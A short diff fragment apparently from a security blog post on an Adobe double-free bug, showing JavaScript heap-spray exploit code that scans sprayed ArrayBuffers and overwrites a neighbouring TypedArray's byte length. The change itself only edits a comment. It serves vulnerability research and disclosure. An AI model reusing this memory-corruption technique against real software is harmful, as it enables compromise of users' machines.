sourceincite/sourceincite.github.io/_posts/2018-05-21-adobe-me-and-a-double-free.md

     for(var i1 = 1; i1 < spraynum; i1++){
         if( sprayarr[i1].byteLength == 0x20000-24){

-            // This is the magic, overwrite the next TypedArray's byte length var biga = new DataView(sprayarr[i1]);
+            // this is the magic, overwrite the next TypedArray's byte length var biga = new DataView(sprayarr[i1]);

             // offset to the byte length in the header